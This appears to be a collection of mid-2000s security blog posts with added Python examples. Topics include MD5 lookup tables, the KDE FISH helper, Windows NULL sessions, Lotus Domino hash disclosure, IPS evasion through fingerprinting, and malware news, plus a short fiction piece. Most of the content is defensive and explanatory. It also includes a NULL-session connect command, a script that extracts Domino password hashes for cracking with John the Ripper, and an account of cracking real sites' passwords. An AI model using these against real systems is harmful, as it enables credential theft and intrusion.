An Online MD5 Hash Database

MD5 hashes protect a variety of content, such as pass phrases and session IDs. The logic behind this is that computing the MD5 of every possible plain text would be a computational nightmare.

This computational nightmare has been brought one step closer to becoming a hacker's/cracker's best friend with the introduction of the "Online MD5 Hash Database". The Online MD5 Hash Database does exactly what its name says: it stores in excess of 12 million different MD5 values together with their corresponding plain text. Note that it is a lookup table, not a cryptanalytic break: it can only return plain texts that someone has already hashed and submitted, and an unsalted MD5 of a common word is exactly what such a table is built to catch.

How good is the engine, you ask? Well, it was able to crack this MD5 hash in near "real time": 1870a829d9bc69abf500eca6f00241fe (wordpress). How did it do it? Some user had already entered the word wordpress into its hash database.

I did the same for the words: security (e91e6348157868de9dd8b25c81aebfb9), securiteam (1d167077e74e969b9b7d34b2d901d697) and SecuriTeam (0a6b8933fcc5ea8234d49769de76cddc).
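To make the mechanism concrete, here is an added example (my code, not the database's) that builds the same kind of reverse index over a constructed wordlist, looks up the hashes of the words above, and shows why a per-user salt defeats it: the salted digest of "wordpress" is simply not in the table. The wordlist and the salt are made up for the example.

```python
import hashlib
import os

# Constructed wordlist standing in for the millions of entries a real online
# database holds; a real table is built the same way, only larger.
WORDLIST = ["password", "wordpress", "security", "securiteam", "SecuriTeam",
            "123456", "letmein", "admin"]


def md5_hex(data: bytes) -> str:
    """Hex MD5 of raw bytes (what the page's hashes are)."""
    return hashlib.md5(data).hexdigest()


def build_table(words):
    """Precompute hash -> plaintext for every guess. This is all the
    'database' is: a reverse index over inputs someone already hashed."""
    return {md5_hex(w.encode()): w for w in words}


def reverse_md5(table, hexdigest: str):
    """Look a hash up; returns the plaintext or None (a miss, not a crack)."""
    return table.get(hexdigest.lower())


def salted_md5_hex(password: str, salt: bytes) -> str:
    """Per-user random salt: the same password hashes differently for every
    user, so a single precomputed table no longer maps back to it."""
    return md5_hex(salt + password.encode())


if __name__ == "__main__":
    table = build_table(WORDLIST)
    for word in ("wordpress", "security", "SecuriTeam"):
        h = md5_hex(word.encode())
        print(f"{h} -> {reverse_md5(table, h)}")
    salt = os.urandom(8)                      # constructed per-user salt
    print("salted lookup:", reverse_md5(table, salted_md5_hex("wordpress", salt)))
```

The lookup is case-insensitive because the database accepts either hex case; the salted call returns None however large the table is, which is the whole argument for salting (or, better, a slow keyed password hash) instead of bare MD5.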


Open Reverse Code Engineering

Reverse engineering a piece of software doesn't sound like something compatible with the word "Open", but in this case OpenRCE is a community of researchers interested in reverse engineering who share their thoughts, tutorials, etc. with each other.


Super Villain

No, this isn't a mistake: this article is about a super villain called Steve, who uses Linux … and a bunch of monkeys, engineered goats and … you will need to watch the Flash movie to learn more :)


Smells FISH(y)

I'm an administrator of a VPS (Virtual Private Server). A few days ago I noticed something weird on the VPS: an odd process running a Perl script, with its output redirected to the almighty black hole, /dev/null. The Bash prompt variable (PS1) was set to empty, and the script itself was written like VBA code (no indentation or line breaks). At a quick glance at the script, I saw that one regex inside it was looking for a command such as rmdir (for example), after which it would unlink a directory.

Sounds like a back door someone wrote; all it needs now is to open a shell for you and be done with it …

Well, NO! In this case the script was installed by KDE for a plain SSH connection that mimics the behaviour of sftp over an ordinary ssh session. The owner of the VPS had logged into the server the KDE way (Konqueror's fish:// KIO slave), and KDE uploaded the script for the user.
Now, when that user logged in, the commands "users" and "who" would not show the user at all ("who -a" shows something, but neither who the user is nor the IP address of the connection), because the ssh session allocates no tty and therefore leaves no utmp entry. "last" also gives you little information about the login, and if someone tries to hide the process, even "ps" won't help (I first spotted the issue with ps) …
Oh, by the way, the script also read from and wrote to /var/log/messages.

BTW, this script implements the FISH protocol ("Files transferred over Shell protocol").

How do I know that, you ask? Well, that's what the Perl script says :-P .
It seems that KDE (and other clients) try to help their users by offering sftp-like actions without leaving the ssh client.

Sounds cool? Well, I guess so… but then again, it IS a back door. That is, if someone is able to make the "server" talk to him without any need for authentication.

People should stop being lazy and start using the right tool for the right job. FISH can be exploited the same way rlogin, telnet and NULL sessions are. Keep in mind that the helper only runs inside an already authenticated ssh session, with that user's privileges; the operational problem is that it is an unexpected process which the usual login accounting does not show.
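Since who/last do not show these sessions, the process table and the home directories are where to look. The following is an added detection example (my code, not KDE's or the post's) that parses a `ps -eo user,pid,ppid,args` snapshot, flags Perl interpreters that either carry the helper's file name or were spawned under an sshd session, and lists helper scripts left in home directories. It assumes the helper is stored as `.fishsrv.pl`, the name current kio_fish uses; verify that against your KDE version and adjust `HELPER_NAME`. The ps snapshot below is constructed, not a real capture.

```python
import subprocess
from pathlib import Path

# Constructed `ps -eo user,pid,ppid,args` snapshot, not a real capture.
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 /sbin/init
root       812     1 /usr/sbin/sshd -D
root      4410   812 sshd: alice [priv]
alice     4415  4410 sshd: alice@notty
alice     4416  4415 perl .fishsrv.pl
root      4501   812 sshd: bob [priv]
bob       4505  4501 sshd: bob@pts/0
bob       4506  4505 -bash
alice     4600     1 perl /home/alice/bin/report.pl
"""

HELPER_NAME = ".fishsrv.pl"   # name used by kio_fish (assumption: check your version)


def parse_ps(text):
    """Turn a ps snapshot into {pid: (user, ppid, args)}; the header is skipped."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        procs[int(pid)] = (user, int(ppid), args)
    return procs


def descends_from_sshd(procs, pid):
    """Walk the parent chain; True if some ancestor is an sshd session process."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        _user, ppid, args = procs[pid]
        if args.startswith("sshd:"):
            return True
        pid = ppid
    return False


def find_fish_helpers(procs):
    """Perl interpreters that carry the helper name or were spawned by an ssh
    session: both are how a kio_fish helper looks from the server side."""
    hits = []
    for pid, (user, ppid, args) in procs.items():
        argv = args.split()
        if not argv or Path(argv[0]).name != "perl":
            continue
        if HELPER_NAME in args or descends_from_sshd(procs, ppid):
            hits.append((pid, user, args))
    return sorted(hits)


def helper_files(home_root="/home"):
    """Helper scripts left behind in home directories (needs read access)."""
    return sorted(str(p) for p in Path(home_root).glob(f"*/{HELPER_NAME}"))


def live_ps():
    """Snapshot the real process table on a Linux host."""
    out = subprocess.run(["ps", "-eo", "user,pid,ppid,args"],
                         capture_output=True, text=True, check=True).stdout
    return parse_ps(out)


if __name__ == "__main__":
    for pid, user, args in find_fish_helpers(live_ps()):
        print(f"pid {pid} ({user}): {args}")
    for path in helper_files():
        print("helper script on disk:", path)
```

In the sample, pid 4416 is reported (Perl under `sshd: alice@notty`, the no-tty session that never reaches utmp), while alice's cron-style `report.pl` under init is not. A process that renames itself can evade the ps check, which is why the on-disk scan is there as well.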


The NULL Session Saga

NULL session is by far the most notorious Windows vulnerability around. What a NULL session basically means is that it is possible to connect to your IPC$ administrative share with no username and no password and gain some juicy data. To demonstrate this, simply run cmd and type:
net use \\host\ipc$ "" /user:""

where host is the IP/name of any machine on the network. If you get 'The command completed successfully.' you are connected to the machine without having provided any credentials.

NULL sessions are more than just information leakage. At least one worm has been known to spread by exploiting both NULL sessions and a vulnerability in RPC.

NULL sessions are so bad that SANS has been constantly including them in the SANS Top 20.

The discussion of whether this is a security vulnerability or a feature has been going on forever. Instead of arguing, let's see how we can solve it for the people who actually want it solved!

Well… It ain’t that simple… Take a deep breath, this is going to be long.

Windows NT 4.0 / Windows 2000:
The problem has been known since the days of NT4. In the good ol' days all that was needed was some spit and nails to solve the problem, or in other words:
Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa change the value RestrictAnonymous from 0 to 1.

Problem solved! Not exactly. This only restricts the information gained from a NULL session; it does not actually block the connection. Specifically, if you set this to 1, the unauthenticated user can't enumerate SAM accounts, but it is still possible to learn a lot about the users on the machine and the network structure.

So, in Windows 2000 Microsoft added another level to RestrictAnonymous. If you set RestrictAnonymous to 2 you actually block ALL unauthenticated access to the IPC$ share. And peace came to the land.

Well… this is swell, if you don't count some pesky bits of software that actually MUST access IPC$ with no username and password. I know of at least one accounting program that was written 10 years ago, and no one actually plans to patch it. Even worse, this also blocks anonymous connections from localhost! So if a poor programmer wants to call NetGroupAddUser, for example, from a local program, it must be done with a username and password!

But the security freaks were once again calm; they had no NULL sessions on their machines, once and for all. Well, until Windows XP, that is.

Windows XP / 2003:
After customer complaints that RestrictAnonymous = 2 made them work hard, Microsoft decided to make life intolerable, er, simpler. In Windows XP we now have three different values controlling the NULL session 'feature', under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa:
1. Good old RestrictAnonymous is still there, but setting it to 1 or 2 yields the same result: NULL connections can still be created, less information leaks.
2. RestrictAnonymousSAM controls anonymous access to SAM accounts (in the past that is what RestrictAnonymous = 1 did).
3. EveryoneIncludesAnonymous: when set to 0 (the factory default), this little piggy keeps anonymous connections out of the 'Everyone' group, so they cannot access resources granted to Everyone.

So what do we get from all these changes? NULL connections can't get SAM accounts, are not in any group, and are generally unwelcome. But! cries the purist, they can still make an anonymous connection!
That's right: in Windows XP, no setting allows the poor administrator to completely block those dreaded NULL connections!

So what can the poor administrator do? The first thought that comes to mind is, of course: use a firewall!

Disable File and Printer Sharing / Filter traffic and IPSec:
1. So why can't we just disable all access to IPC$? Who needs it anyway?
The simplest way is to just uncheck 'File and Printer Sharing for Microsoft Networks' on every network interface on the machine! Yup. That works. If you don't need shared directories, shared printers, remote registry or anything of the sort…
Not a very valid solution in many cases.

2. OK, let's firewall the damn thing. Just block all incoming traffic on 445/139. Nice try. Microsoft puts so many services on these two poor ports that it can make your eyes bleed. Just as an example: Computer Browser, Workstation, Server, Remote Registry, File / Printer Sharing, DCOM and so on…
OK, I'll just allow authenticated connections and reject all unauthenticated ones. I'm sure my firewall can do that!
Not exactly, at least not the firewall built into 2000 / XP / 2003 (IPSec filters or the Windows XP Service Pack 2 firewall). These guys only filter on addresses and ports. There is no way to tell an authenticated SMB connection from an anonymous one at that layer. What now?

3. IPSec policy. You heard right: enforce Kerberos (or equivalent) authentication on all SMB connections. Make everyone authenticate with the Active Directory server before even accessing the port!
That's actually a very nice solution; the only problem is that it's a bit awkward. You need an Active Directory server, have all workstations and servers authenticate via that server, and don't forget to manage and harden your brand new Active Directory server, otherwise you're back at square one.
Not to mention that this kind of system takes time to build, check and finally maintain. But this solves NULL sessions on XP, 2003 and probably on any new Microsoft Windows system.

Bottom Line:
If you understand the implications of NULL sessions in your organization, I strongly recommend that you start thinking about how to solve, or at least minimize, the problem. IPSec is by far the 'complete' solution, but it requires configuration and investment in a working authentication server. In the meantime, harden the registry where possible, and enforce good network separation between subnets.
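"Harden the registry where possible" is easier to apply consistently with a script. The following is an added example (my code, not from the post or from Microsoft) that reads the three LSA values discussed above from the local registry on Windows and rates the host's anonymous-access posture the way the post lays it out: only Windows 2000 with RestrictAnonymous = 2 actually refuses the connection; everything else merely limits what a NULL session can see. The `assess()` function is pure and portable so it can be run against values collected from other machines; the OS family is passed in by hand ("nt4", "2000" or "xp2003") because the registry alone does not tell you which semantics apply.

```python
import sys
try:
    import winreg            # Windows only; assess() itself is portable
except ImportError:
    winreg = None

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
VALUES = ("RestrictAnonymous", "RestrictAnonymousSAM", "EveryoneIncludesAnonymous")


def read_lsa_values():
    """Read the three LSA values from the local registry (Windows only).
    Values that do not exist are reported as None so the caller sees what is unset."""
    if winreg is None:
        raise RuntimeError("registry audit only runs on Windows")
    found = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_KEY) as key:
        for name in VALUES:
            try:
                found[name], _type = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                found[name] = None
    return found


def assess(family, values):
    """Rate NULL session exposure from registry values.

    family: "nt4", "2000" or "xp2003".  Returns (posture, findings) with posture
    one of "open", "restricted", "blocked".  Encodes the behaviour described in
    the post: RestrictAnonymous=2 blocks the connection on Windows 2000 only;
    on XP/2003 no registry value blocks it, the other two values just narrow
    what anonymous callers can read.
    """
    ra = values.get("RestrictAnonymous") or 0
    if family == "2000" and ra >= 2:
        return "blocked", ["RestrictAnonymous=2: anonymous IPC$ connections are refused "
                           "(also from localhost, which breaks some legacy software)"]
    findings = []
    if ra == 0:
        findings.append("RestrictAnonymous=0: null sessions connect and enumerate freely")
    else:
        findings.append(f"RestrictAnonymous={ra}: null sessions still connect; "
                        "enumeration is limited")
    if family == "xp2003":
        if not values.get("RestrictAnonymousSAM"):
            findings.append("RestrictAnonymousSAM missing or 0: SAM accounts can be "
                            "enumerated anonymously")
        if values.get("EveryoneIncludesAnonymous"):
            findings.append("EveryoneIncludesAnonymous=1: anonymous inherits Everyone ACLs")
        findings.append("no registry value on XP/2003 blocks the connection itself; "
                        "use IPSec policy or filtering for that")
    return ("open" if ra == 0 else "restricted"), findings


if __name__ == "__main__":
    family = sys.argv[1] if len(sys.argv) > 1 else "xp2003"
    posture, notes = assess(family, read_lsa_values())
    print("posture:", posture)
    for note in notes:
        print(" -", note)
```

Run it as `python audit_lsa.py 2000` (or `xp2003`) from an administrative prompt on the host. A "restricted" result still means the `net use` test above succeeds; treat it as the ceiling of what the registry alone can give you on XP/2003.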


Getting Further with Lotus Domino Password Disclosure

We recently reported a Lotus Domino vulnerability: Default Configuration Information Disclosure in Lotus Domino (Including Password Hashes). On its surface this vulnerability looks pretty harmless, but a quick investigation shows just how dangerous it really is.

The advisory discusses the possibility of Lotus Domino users' hashed passwords being retrieved by an unauthenticated/unprivileged user who simply accesses the Lotus Domino "Public Address Book" (names.nsf). This address book not only contains the list of all users with their phone number, email, pager :P , department code, room number, etc., but also their password hash.

The password can't be seen unless you view the source of the page and capture the value after the HTTPPassword variable, for example <input name="HTTPPassword" type="hidden" value="(…)">. The hash (Domino's unsalted R5 format, 32 hex digits) can then be broken using the patch for John the Ripper provided at , and specifying to John that you are interested in breaking Lotus5 hashes.

The brute forcing mechanism is pretty quick: on an Intel Pentium 4 with a 2.80GHz CPU John tries around 150,000 c/s.

Using Google I was able to locate a few vulnerable sites and crack their users' passwords in a few seconds (some were very simple passwords: password – passpass – enter – default – 123456), demonstrating that this vulnerability is a very serious one.
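Viewing source by hand does not scale across an address book, so here is an added example (my code, not the advisory's or John's) that pulls every HTTPPassword hidden field out of a fetched person document, pairs it with the preceding user field, classifies the hash format, and emits `user:hash` lines in the shape John's wordlist and format options expect. The HTML fragment, the user names and the hash values are all constructed for the example. The pairing assumes the document exposes a ShortName hidden field before the HTTPPassword one (adjust `user_field` to whatever your target's form actually carries), and the recognition of the parenthesised Domino 6 salted form as John's "dominosec" format is an assumption; the 32-hex-digit Lotus5 form is the one the advisory covers.

```python
import re
import urllib.request

# Constructed excerpt of a person document as served from names.nsf;
# names and hashes are made up, not taken from any real server.
SAMPLE_HTML = """
<form method="post">
<input name="ShortName" type="hidden" value="jsmith">
<input name="HTTPPassword" type="hidden" value="355E98E7C7B59BD810ED845AD0FD2FC4">
</form>
<form method="post">
<input name="ShortName" type="hidden" value="rdoe">
<input name='HTTPPassword' type='hidden' value='(GKjXibCW2Ml6juyQHUoCCoAC)'>
</form>
"""

TAG_RE = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
# name=... / value=... with double quotes, single quotes or no quotes at all
ATTR_RE = re.compile(r"\b(name|value)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
                     re.IGNORECASE)


def hidden_inputs(html):
    """Yield (name, value) for every <input> tag regardless of quoting style."""
    for tag in TAG_RE.finditer(html):
        attrs = {}
        for m in ATTR_RE.finditer(tag.group(0)):
            attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
        if "name" in attrs:
            yield attrs["name"], attrs.get("value", "")


def hash_format(h):
    """Map a Domino HTTPPassword value to the John format that cracks it."""
    if re.fullmatch(r"[0-9A-Fa-f]{32}", h):
        return "lotus5"      # Domino R5 unsalted hash, John's "lotus5" format
    if re.fullmatch(r"\(G[A-Za-z0-9+/]{20,30}\)", h):
        return "dominosec"   # Domino 6+ salted form (assumption: John's "dominosec")
    return "unknown"


def extract_hashes(html, user_field="ShortName"):
    """Pair each HTTPPassword with the most recent user field seen before it."""
    records = []
    current_user = None
    for name, value in hidden_inputs(html):
        if name == user_field:
            current_user = value
        elif name.lower() == "httppassword" and value:
            records.append((current_user or "unknown", value, hash_format(value)))
    return records


def john_lines(records):
    """John-style 'user:hash' lines; feed them in with --format=<hash_format>."""
    return [f"{user}:{h}" for user, h, _fmt in records]


def fetch(url, timeout=10):
    """Plain GET of one person document; the caller supplies the URL."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(resp.headers.get_content_charset() or "latin-1")


if __name__ == "__main__":
    for line in john_lines(extract_hashes(SAMPLE_HTML)):
        print(line)
```

Split the output by format before running John, since one `--format` applies per run; a site that has moved to the salted Domino 6 scheme will show up as the parenthesised form and will not crack at the Lotus5 rate quoted above.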


Zotob.A Exploits PnP Vulnerability

A new worm has been found in the wild: Zotob.A. This new worm exploits a recently published Microsoft vulnerability in Windows' Plug and Play (PnP) service.

This new worm is quite interesting: Microsoft released MS05-039 on August 9, 2005, an exploit for this vulnerability was released 3 days later on August 12, 2005, and now a worm has been set loose, all in less than 5 days.

I think this is a new record for the "vulnerability -> patch -> exploit -> worm" cycle.

Time will tell how widespread this worm will be; you can learn more about it in the following post: Zotob.A.


Social Engineering the Dilbert Way

The following illustrates how Dilbert's Dogbert uses social engineering to get the Pointy-Haired Boss to give him his social security number and password :) :


Is that an OS X in your PC or are you just happy to see me?

In my previous post I discussed how Apple placed a TPM device in their computers to try to make it difficult to install their Tiger operating system on "normal" (i.e. non-Apple) Intel-based computers. It appears that Justin Nolan has been able to get around this and has placed a HOW-TO guide at the following URL: , hooray for him :) . In any case, you can probably save yourself the time and buy (or get for free) a Mac mini bundled with Tiger (Mac OS X).


Hidden Problems

I recently encountered a company that requested to be scanned for known vulnerabilities and asked for a report on the status of their servers. The company protected their servers with an IPS that blocks connections from anyone who attempts a port scan, etc. So the port scan failed, our scanning server was blocked, and the company was very happy that their IPS was able to block the scan. They received a report that said their servers were 'black holes'. They were unhappy with the report and wanted confirmation that their servers were not vulnerable.

I do not like this type of arrogance. People think they're smart, and then some script kiddie comes along, tries some exploit for the first time, and breaks into their system without breaking a sweat.

This arrogance comes from IT personnel who regard IDS and IPS as really cool tools, because they can use them to show their bosses: "Look, Mr. Boss, no one can penetrate us, as we block any attempt to scan us." Mr. Boss would then conclude: "Cool, so we are now 'hacker free'."

Well, here most people will say to themselves YES! But that is not the case, people!!!

IDS/IPS are only one gate to be passed. Sometimes it's easier to use HTTP, SMTP, or whatever commonly used open service is there, and penetrate through that service…

Most of the people reading these words probably know how to do it: by using known vulnerabilities in the services the company runs.

But how can someone know exactly which service this company uses? Hmm, let's see. Let's send an email to the company and ask for more information about their product. We do so to see a mail signature: server, client, path, fill in the missing field. Oh wait, that was too hard; let's look at the company's web page. OK, it's ASP. Let's look at a 404 page… Yep, it has different strings inside for every version… so I know what to exploit for each version…

Another way is to use JavaScript that returns to me a list of system variables from the server… Some variables exist only for specific servers. And those are just two very short examples…
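The 404-page trick above is a single ordinary request, which is exactly why a scan-blocking IPS never sees it. Here is an added example (my code, not the post's) of that fingerprinting step: it requests one bogus path, then reads the version-bearing headers and matches the error body against a small signature list. The response, the signature phrases and the probe path are constructed for the example; the header names (`Server`, `X-Powered-By`, `X-AspNet-Version`) are the real ones IIS/ASP.NET send, and the body signatures are a starting point to extend from your own captures.

```python
import socket
from urllib.parse import urlsplit

# Constructed 404 response, not a capture from any real host.
SAMPLE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 1.1.4322\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>The page cannot be found</title></head>"
    "<body>The page cannot be found</body></html>"
)

# Body phrases that identify the server even when the Server header is
# stripped. Constructed for the example; grow this list from your own captures.
BODY_SIGNATURES = {
    "The page cannot be found": "IIS default 404 page",
    "Apache/": "Apache default error page (version in body)",
}

VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")


def parse_response(raw):
    """Split a raw HTTP response into (status line, {header: value}, body)."""
    head, _sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _sep, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def fingerprint(raw):
    """Collect every version clue a single error response gives away."""
    status, headers, body = parse_response(raw)
    clues = {"status": status}
    for name in VERSION_HEADERS:
        if name in headers:
            clues[name] = headers[name]
    for phrase, meaning in BODY_SIGNATURES.items():
        if phrase in body:
            clues.setdefault("body", []).append(meaning)
    return clues


def probe(url, path="/this-page-does-not-exist-x9", timeout=5):
    """One plain GET of a bogus path over a single TCP connection; nothing
    here looks like a scan to an IPS. Returns the raw response text."""
    parts = urlsplit(url)
    host, port = parts.hostname, parts.port or 80
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


if __name__ == "__main__":
    print(fingerprint(SAMPLE_404))
```

Against the constructed response the result names IIS 6.0 and ASP.NET 1.1.4322 from headers alone, and the body signature would still name IIS if those headers were removed. That is the information the post says the IPS cannot hide, obtained with one request.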

So you see, Mr. Boss? I can't port scan you, or use some other kind of "brute force" action, but I can gather information, and even exploit your systems using their known vulnerabilities (or zero-day ones). You are not protected by IDS/IPS; you have only swept the dirt under the rug.

IDS/IPS are only as good as the rest of your services' security. They can help prevent attacks, but only when everything else works well.

Or in less harsh words, don’t hide the problems, solve them instead.


From ATM Cameras to “Mouse Cameras”

You have probably heard of thieves placing small cameras above an ATM's keypad to capture the user's keystrokes, i.e. the PIN. This idea has been borrowed by at least one Trojan/spyware I am aware of: Dumaru.

As explained in the following paper, HOW DUMARU?, one of the "features" this Trojan/spyware has is the ability to capture a picture of the vicinity of the mouse pointer whenever the mouse button is pressed.

The picture is then transmitted to the proprietors of the Trojan/spyware. As capturing all mouse click events would be too expensive, the Trojan/spyware focuses on two web pages: C:\DATA\SRK.HTA (the local copy of the e-Gold logon page) and – Microsoft Internet Explorer.


I didn’t do it, my MD5 was Tampered

You already know that MD5 was found to be vulnerable to collisions, i.e. two different plain texts can be made to produce the same MD5 value.

What most people expected next was to see the security implications: PKI systems getting "broken", credit card fraud rising, etc. What they didn't expect was this: Motorist wins case after maths whizzes break speed camera code.

To summarize the article: the cracking of the MD5 algorithm by the Chinese group saved this guy from getting a ticket, as the police couldn't state that the MD5 used to "store" (yes, they say store) the time, date, place, number plate and speed of cars hadn't been tampered with.

Oh, come on :D . The judge doesn't look at the value 69f034b96312b3d012b37cd26ee8680d and say… yeah, I see he has been speeding :) . The value is used to confirm the authenticity of the ticket's parameters, i.e. time, date, etc. For someone to both produce a matching MD5 value and put the right values in the database would be more than an amazing feat; it would be practically impossible.

The Chinese group didn't provide a mechanism for tampering with MD5-protected data; rather, they showed that if you have a "free" plain text, as in the case of a PostScript file that can contain arbitrary binary data invisible to the end user, you can make a modified plain text appear genuine by adding "junk" binary data to compensate for the change, in such a way that the MD5 value stays the same.

So in this case, I don't have the privilege of inserting arbitrary data, and so I can't tamper with the plain text enough to generate the same MD5 value. This is a collision attack, in which the attacker prepares both documents in advance; it is not a way to find a second input for a hash that someone else has already computed.

To conclude, the police lost because they "failed to find an expert to testify that its speed camera images were secure", or in plain words, because they were stupid.
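One caveat worth adding, beyond what the article argues: collisions aside, a bare MD5 over the ticket fields only proves integrity against someone who cannot recompute it, and anyone with write access to the record can. A keyed MAC fixes that. The example below is my code, not the camera vendor's or the article's; the ticket record, the field set and the key are constructed. It stores a record two ways, with an unkeyed MD5 as the article describes and with an HMAC, and then has an "editor" with database access alter the speed and recompute the check value the only way they can, without the key.

```python
import hashlib
import hmac

FIELDS = ("time", "date", "place", "plate", "speed_kmh")

# Constructed record for the example, not the ticket from the article.
TICKET = {"time": "14:32:07", "date": "2005-08-15", "place": "M1 northbound",
          "plate": "ABC123", "speed_kmh": "131"}


def canonical(fields):
    """Fixed field order and a separator that cannot appear in the values, so
    two different records never serialise to the same bytes."""
    return "\x1f".join(fields[f] for f in FIELDS).encode()


def bare_md5(fields):
    """The article's scheme: an unkeyed digest over the parameters."""
    return hashlib.md5(canonical(fields)).hexdigest()


def keyed_tag(fields, key):
    """HMAC-SHA256 over the same bytes; forging it needs the key, not a collision."""
    return hmac.new(key, canonical(fields), hashlib.sha256).hexdigest()


def store(ticket, key=None):
    """The row as it sits in the database: values plus a check value.
    key=None models the unkeyed MD5; a key models a verifier that holds a secret."""
    fields = {f: ticket[f] for f in FIELDS}
    tag = bare_md5(fields) if key is None else keyed_tag(fields, key)
    return dict(fields, check=tag)


def check(record, key=None):
    """Recompute the check value and compare in constant time."""
    fields = {f: record[f] for f in FIELDS}
    expected = bare_md5(fields) if key is None else keyed_tag(fields, key)
    return hmac.compare_digest(expected, record["check"])


def forge(record, **changes):
    """An editor with write access changes values and recomputes the check the
    only way available without the key: the public, unkeyed algorithm."""
    fields = {f: record[f] for f in FIELDS}
    fields.update(changes)
    return dict(fields, check=bare_md5(fields))


if __name__ == "__main__":
    key = b"constructed-secret-key"       # constructed; keep a real one out of the DB
    plain = store(TICKET)
    print("unkeyed, forged speed verifies:", check(forge(plain, speed_kmh="98")))
    keyed = store(TICKET, key)
    print("keyed, forged speed verifies:  ", check(forge(keyed, speed_kmh="98"), key))
```

The unkeyed record accepts the forged row, so the MD5 there proves nothing about who wrote the values; the keyed record rejects it. Whether the collision result applies is then beside the point: the question for the court should have been who holds the key and where it is verified.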


WordPress Command Execution Vulnerability

Yet again a command execution vulnerability has been found in WordPress. The vulnerability affects any WordPress installation that resides on a web server whose PHP settings indicate register_globals = On.

Why do sites still have this set to On? I don't know. We also had it set to On until just a few hours ago… :P .

In any case, the best way to stop yourself from being hacked is to set register_globals to Off (in php.ini, or with php_flag register_globals off in .htaccess where the host allows it).

You can find an exploit that you can use to test your system at:


Linux Passes the WGA Test

According to "Linux with Wine passes Microsoft's WGA without a hitch", Linux under Wine passes Microsoft's Windows Genuine Advantage check. Does this mean that Microsoft has a soft spot for Linux? I can't believe that :)


Nisco – Connecting people

Nisco was born of two market leaders joining forces: Nokia, the world-renowned cellular phone developer, and Cisco, the company whose products serve as the Internet's infrastructure. The aim of Nisco was to connect people in a way very similar to how computers and other devices have been connected into one huge network.

The Tele-people device, a device that connects (much like a phone) a person to a network of other people, made communication between two people instantaneous and seamless. All you needed to do to reach someone was to think about them. From that moment, any thought that crossed his or her mind would cross yours, and vice versa. This brought the community closer together, created a whole new type of entertainment and new relationships, and changed the meaning of meeting people.

However, as with any other new technology, trouble didn't lag far behind. The technology came out roughly seven years ago to the day. When it came out, there was a lot of debate on whether or not it was dangerous to link people's minds directly to technology. In its first year, the technology was thoroughly tested and no problems were found. Once the FCC and FDA had granted their approval, people started getting the device implanted, which in turn generated additional word of mouth, resulting in more people getting the implants.

It took nearly three years before someone was able to use the technology to harm consumers. At first the perpetrator tried to warn people, but was quickly silenced by Nisco's attorneys and investigated by the FBI on the charge of endangering national security. Unfortunately for Nisco, the information on how this harm could be done quickly spread throughout the network, making anyone with a bit of intelligence capable of modifying his implant to do more than just connect with other people.

What happened next was totally unexpected. The first worm-like modification to the implant was released into the network, infecting millions of people and placing their devices in a constant state of broadcast. This sent their thoughts, feelings, visions, and basically anything that crossed their minds into the public domain. As the worm continued to modify people, more and more broadcasts cluttered the network, leaving infected people unable to function, as they were constantly and simultaneously receiving feeds from thousands of sources.

Matters quickly deteriorated as the first cases of total mental breakdown were reported. A quarter of a million people were no longer functioning; unable to work, eat or sleep, they simply withered and died. In addition, the number of people infected slowly but surely reached the staggering billions, and Nisco stood by, unable to believe that something like this could be happening to them. The government, of course, was quick to react with an investigation, but it was already too late for the people who had got themselves implanted with the Nisco technology. Since there was no way of disconnecting them from the network without causing them harm, there was no sure way of protecting them from the spreading worm.

As millions died, the court system made hacking (software or hardware) as illegal as murder, eventually making the death sentence mandatory for such crimes. Unfortunately for the person who released the worm, and for the rest of the world, he got infected as well, squashing any prospect that a solution might be found.

The number of new people getting connected to the network dropped to zero. People connected to the network continued to die from the effects of the worm, and many also chose the path of suicide by having their implants removed. As the number of connected people diminished, so did the number of infections, and eventually the worm was unable to find new candidates for infection and disappeared.

The world remained devastated. Technologies that integrated people with machines were made illegal, and not even rebellious countries like China allowed their researchers to perform academic research in the field. Nisco was taken to court, where it lost and had to pay compensation to millions of people left with their loved ones mentally handicapped, or all alone as their spouses, children, brothers or sisters died as a result of this complete mental breakdown. These compensations brought Nisco to its knees, and the company filed for bankruptcy, which was the only thing it could do now that consumers no longer wanted to buy anything related to or manufactured by the once-considered giant of the industry, Nisco.

So came to an end the merger between the two market leaders, Cisco and Nokia. People still remember the famous press release Cisco and Nokia issued when they merged: people's lives will change forever. How right they were, and how wrong we were to disregard their statement as just a marketing scheme.


Drive-by spyware which, well, spies on you

CoolWebSearch (CWS) is an interesting advertising company. What sets it apart from your run-of-the-mill advertising company is that it specifically uses browser vulnerabilities (mainly in Internet Explorer) to install its spyware/adware as the user browses one of its numerous affiliate sites. No user interaction whatsoever. The industry has dubbed this type of activity 'drive-by installation'.

It appears that an invisible boundary has now been crossed, with a CWS variant that specifically collects keystrokes, and potentially other information, and posts them to an Internet server.

Check out the Sunbelt Software blog and remember: this is just a blog and the alleged research results of a single person. Don't jump to conclusions, not just yet.

